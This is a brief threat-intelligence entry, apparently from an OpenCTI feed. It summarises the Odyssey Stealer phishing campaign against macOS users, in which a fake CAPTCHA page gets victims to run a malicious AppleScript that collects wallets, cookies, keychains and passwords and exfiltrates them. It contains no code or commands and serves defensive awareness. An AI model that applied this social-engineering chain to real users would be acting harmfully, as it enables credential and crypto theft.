Odyssey Stealer Malware Attacks macOS Users

SUMMARY :

A phishing campaign targeting macOS users employs a ClickFix technique to deliver the Odyssey Stealer malware. The attack uses a fake CAPTCHA verification page that executes without dropping a binary on the system. When users follow the instructions, they unknowingly execute a malicious AppleScript that collects sensitive data, including crypto wallet information, browser extensions, cookies, saved keychains, usernames, and passwords. The script creates a ZIP archive of the stolen data and exfiltrates it to a command and control server. This sophisticated attack blends phishing and social engineering to bypass traditional detection methods, making it challenging to detect and analyze.

OPENCTI LABELS :

phishing,macos,credential theft,clickfix,applescript,odyssey stealer,crypto wallet


Open in NetmanageIT OpenCTI Public Instance with below link!


Use public read only username and password on login page.

NOTE : Use Public READ only user credentials on login page banner.


Odyssey Stealer Malware Attacks macOS Users